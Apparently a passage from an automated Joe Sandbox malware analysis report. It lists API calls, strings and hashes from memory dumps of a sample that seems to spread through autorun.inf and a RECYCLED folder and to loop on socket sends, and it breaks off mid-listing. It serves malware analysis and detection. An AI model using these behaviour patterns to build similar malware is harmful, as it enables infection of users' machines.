                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  Strings
                                                                  • %s.Blocked "%S" from creating "%S", xrefs: 00406A24
                                                                  • %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 00406A06
                                                                  • autorun.inf, xrefs: 00406970
                                                                  • pdef, xrefs: 00406986
                                                                  • .exe, xrefs: 0040699C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
                                                                  • String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
                                                                  • API String ID: 2285763329-814828592
                                                                  • Opcode ID: 205a7d89b2524849cebba101b25715d3832c541841bc0d4d6ca336ccb213c6d9
                                                                  • Instruction ID: 767322c83212b5698aabde80e4d44f6b16f99ddbb09b22e2f03322de5ae40dfa
                                                                  • Opcode Fuzzy Hash: 205a7d89b2524849cebba101b25715d3832c541841bc0d4d6ca336ccb213c6d9
                                                                  • Instruction Fuzzy Hash: 19118979BC031033DA1037597C47FCB36494B51B56F164037FA15F12D2D9ADD8A085AE
                                                                  APIs
                                                                    • Part of subcall function 003619F0: wcsrchr.MSVCRT ref: 003619F9
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • strstr.MSVCRT ref: 003669A8
                                                                  • lstrcmpA.KERNEL32(00376D88,003AAC50,?,?,?,?,?,?), ref: 003669BE
                                                                  • SetFileAttributesA.KERNEL32(00376E90,00000080,?,?,?,?,?,?), ref: 003669D2
                                                                  • DeleteFileA.KERNEL32(00376E90,?,?,?,?,?,?), ref: 003669DD
                                                                  • MoveFileExA.KERNEL32 ref: 003669EC
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  Strings
                                                                  • %s.Blocked "%S" from creating "%S", xrefs: 00366A24
                                                                  • %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 00366A06
                                                                  • autorun.inf, xrefs: 00366970
                                                                  • pdef, xrefs: 00366986
                                                                  • .exe, xrefs: 0036699C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
                                                                  • String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
                                                                  • API String ID: 2285763329-814828592
                                                                  APIs
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403DA4
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • DisconnectNamedPipe.KERNEL32(?,?,?,00000000,000000FF,?,?), ref: 00403F68
                                                                  • ConnectNamedPipe.KERNEL32(?,?,?,?,00000000,000000FF,?,?), ref: 00403F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 4113577031-0
                                                                  APIs
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363DA4
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • DisconnectNamedPipe.KERNEL32(?,?,?,00000000,000000FF,?,?), ref: 00363F68
                                                                  • ConnectNamedPipe.KERNEL32(?,?,?,?,00000000,000000FF,?,?), ref: 00363F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 4113577031-0
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004090A0
                                                                    • Part of subcall function 0040A0F0: wcsrchr.MSVCRT ref: 0040A0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00409101
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003690A0
                                                                    • Part of subcall function 0036A0F0: wcsrchr.MSVCRT ref: 0036A0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 00369101
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00406E9C,00000000,00000000,00000000,?,?,00406E9C), ref: 0040B178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00406E9C), ref: 0040B186
                                                                  • lstrlenA.KERNEL32(00406E9C,?,?,00406E9C), ref: 0040B18F
                                                                  • strstr.MSVCRT ref: 0040B19F
                                                                  • strstr.MSVCRT ref: 0040B1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00406E9C), ref: 0040B1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00406E9C), ref: 0040B1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B1F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00366E9C,00000000,00000000,00000000,?,?,00366E9C), ref: 0036B178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00366E9C), ref: 0036B186
                                                                  • lstrlenA.KERNEL32(00366E9C,?,?,00366E9C), ref: 0036B18F
                                                                  • strstr.MSVCRT ref: 0036B19F
                                                                  • strstr.MSVCRT ref: 0036B1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00366E9C), ref: 0036B1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00366E9C), ref: 0036B1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036B1F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Allocstrstr$Freelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1314289781-2344752452
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0040AC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0040AC3E
                                                                  • GetLastError.KERNEL32 ref: 0040AC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0040AC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0040AC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 0040AC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040ACB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0036AC1A
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0036AC3E
                                                                  • GetLastError.KERNEL32 ref: 0036AC44
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0036AC5E
                                                                  • HttpQueryInfoW.WININET(?,8000002D,00000000,?,?), ref: 0036AC79
                                                                  • lstrcmpW.KERNEL32(POST,00000000), ref: 0036AC85
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AC99
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036ACB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFreeHttpInfoQuery$ErrorLastlstrcmp
                                                                  • String ID: POST
                                                                  • API String ID: 770645459-1814004025
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040A6AF
                                                                  • memset.MSVCRT ref: 0040A6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 0040A6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 0040A6F9
                                                                  • _snwprintf.MSVCRT ref: 0040A71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0040A77F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036A6AF
                                                                  • memset.MSVCRT ref: 0036A6CA
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 0036A6DF
                                                                  • PathAppendW.SHLWAPI(?,Internet Explorer\iexplore.exe), ref: 0036A6F9
                                                                  • _snwprintf.MSVCRT ref: 0036A71B
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0036A77F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Pathmemset$AppendCreateFolderProcessSpecial_snwprintf
                                                                  • String ID: "%s" %S$D$Internet Explorer\iexplore.exe
                                                                  • API String ID: 1165436438-694066683
                                                                  APIs
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • GetTickCount.KERNEL32 ref: 00409467
                                                                  • htons.WS2_32(?), ref: 00409490
                                                                  • GetTickCount.KERNEL32(?), ref: 004094BD
                                                                  • GetTickCount.KERNEL32 ref: 004094C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 004094F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00409511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 0040953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 00409549
                                                                  • closesocket.WS2_32(?), ref: 00409559
                                                                  • GetTickCount.KERNEL32(?), ref: 00409564
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  APIs
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • GetTickCount.KERNEL32 ref: 00369467
                                                                  • htons.WS2_32(?), ref: 00369490
                                                                  • GetTickCount.KERNEL32(?), ref: 003694BD
                                                                  • GetTickCount.KERNEL32 ref: 003694C1
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 003694F6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00369511
                                                                  • sendto.WS2_32(?,?,00001964,00000000,00000002,00000010), ref: 0036953C
                                                                  • Sleep.KERNEL32(00000064,00000002,00000002,00000011), ref: 00369549
                                                                  • closesocket.WS2_32(?), ref: 00369559
                                                                  • GetTickCount.KERNEL32(?), ref: 00369564
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleepclosesocketgethostbynamehtonsinet_addrioctlsocketsendtosocket
                                                                  • String ID:
                                                                  • API String ID: 2400900511-0
                                                                  • Opcode ID: 2d0bb29160b7f58d1b29a98609f763881beb4d39e599d32d7956cc4d729ee439
                                                                  • Instruction ID: 60da4290a813544fe6969eecd173f6694a608e44394a2b10f08b58f30aae1963
                                                                  • Opcode Fuzzy Hash: 2d0bb29160b7f58d1b29a98609f763881beb4d39e599d32d7956cc4d729ee439
                                                                  • Instruction Fuzzy Hash: 8B313D729001249BD722EBF98C46BBEB39D9F88304F528536FA49EB185D9B48D01C7A1
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040ACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0040AD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0040AD2B
                                                                  • GetLastError.KERNEL32 ref: 0040AD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0040AD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0040AD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 0040AD80
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0040ADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040ADE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: f8d406ff39b3867032f2cbca4d285a4a1005a8dcd899ed6f5777e548e8282404
                                                                  • Instruction ID: 00504cc4e49c33e4c2d117f02b4e2dde52e53599f86eef1a5ae60fdc04d2353b
                                                                  • Opcode Fuzzy Hash: f8d406ff39b3867032f2cbca4d285a4a1005a8dcd899ed6f5777e548e8282404
                                                                  • Instruction Fuzzy Hash: 42317C74500305BBD7209B95CC85FEBBBB9EF8A711F108165FA04AB2D0D7B49D40CBA9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036ACF5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?), ref: 0036AD0A
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0036AD2B
                                                                  • GetLastError.KERNEL32 ref: 0036AD31
                                                                  • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 0036AD4F
                                                                  • InternetQueryOptionW.WININET(?,00000022,00000000,?), ref: 0036AD63
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 0036AD80
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AD93
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0036ADB3
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036ADE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInternetOptionQuery$??2@ByteCharErrorFreeLastMultiWidelstrcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3155763378-0
                                                                  • Opcode ID: 74af3b2a445bc6e2730f105fdb887c05632e6bd98fc9b47930d7131c237281e2
                                                                  • Instruction ID: 88d9285c98d00897fb8f9878a1599598a7f0b58bc134a515192ad101ac2e1d6a
                                                                  • Opcode Fuzzy Hash: 74af3b2a445bc6e2730f105fdb887c05632e6bd98fc9b47930d7131c237281e2
                                                                  • Instruction Fuzzy Hash: 8E318075500614BBD722DB99CC85FABBBBCEF86711F508144FA09AB284D7B0AD40CFA1
                                                                  APIs
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(?), ref: 0040935D
                                                                  • GetTickCount.KERNEL32(?), ref: 0040936F
                                                                  • GetTickCount.KERNEL32 ref: 00409373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004093A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004093C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 004093DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 004093EB
                                                                  • closesocket.WS2_32(?), ref: 004093F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 00409405
                                                                  • GetTickCount.KERNEL32 ref: 00409407
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: de3095b561cd0ee4a074b4b2388ced171c2f3cf8f2c1d860a68ce1fb6dd27ffa
                                                                  • Instruction ID: d2cec284f92f2c482fe6d1749ee7125162ceb74f25a5afa3c33734025d3d2087
                                                                  • Opcode Fuzzy Hash: de3095b561cd0ee4a074b4b2388ced171c2f3cf8f2c1d860a68ce1fb6dd27ffa
                                                                  • Instruction Fuzzy Hash: 90210872800224ABC720FBB9DD45BCEF769DB88304F01462AF908F72D1D6B49D81CB99
                                                                  APIs
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • htons.WS2_32(?), ref: 0036935D
                                                                  • GetTickCount.KERNEL32(?), ref: 0036936F
                                                                  • GetTickCount.KERNEL32 ref: 00369373
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003693A6
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003693C1
                                                                  • connect.WS2_32(?,?,00000010), ref: 003693DE
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003693EB
                                                                  • closesocket.WS2_32(?), ref: 003693F8
                                                                  • Sleep.KERNEL32(0000004B,?), ref: 00369405
                                                                  • GetTickCount.KERNEL32 ref: 00369407
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep$closesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 1090714710-0
                                                                  • Opcode ID: 28009f9c97aba0445a8354ef7f30ad8305f256150ea8f071ea275ea418510cfe
                                                                  • Instruction ID: a6f5bb31eab11e8b71ba245a515787df8581fc6b62c7c976c5847162294eb4f6
                                                                  • Opcode Fuzzy Hash: 28009f9c97aba0445a8354ef7f30ad8305f256150ea8f071ea275ea418510cfe
                                                                  • Instruction Fuzzy Hash: 4B210872900224ABC722FBB89D45B9EB76D9B84310F128616F90CEB284D6B49D41CBD1
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040FCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040FCBD
                                                                  • _snprintf.MSVCRT ref: 0040FCE0
                                                                  • lstrcpyW.KERNEL32(0044B9A0,0044ADA0), ref: 0040FCF2
                                                                  • lstrcpyA.KERNEL32(0044BDB0,RECYCLED), ref: 0040FD08
                                                                  • lstrcpyA.KERNEL32(0044BEB4,?), ref: 0040FD16
                                                                    • Part of subcall function 0040F9E0: memset.MSVCRT ref: 0040F9FF
                                                                    • Part of subcall function 0040F9E0: GetLogicalDriveStringsA.KERNEL32 ref: 0040FA22
                                                                    • Part of subcall function 0040F9E0: lstrcatA.KERNEL32(00000000,00413040), ref: 0040FA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040FD61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 0cfa70081205f2bb7b5b1627183ae57c4ab90c2d5b469cd82343f9c2e12f9893
                                                                  • Instruction ID: dc7a5fa392d0d149d72329117f2babda223c444661474c01379b6b2072300756
                                                                  • Opcode Fuzzy Hash: 0cfa70081205f2bb7b5b1627183ae57c4ab90c2d5b469cd82343f9c2e12f9893
                                                                  • Instruction Fuzzy Hash: D611C8B9940318BBD310AF65AC82BD5B678EB49704F50407BF604A21D1D7F859C48F9D
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036FCB0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036FCBD
                                                                  • _snprintf.MSVCRT ref: 0036FCE0
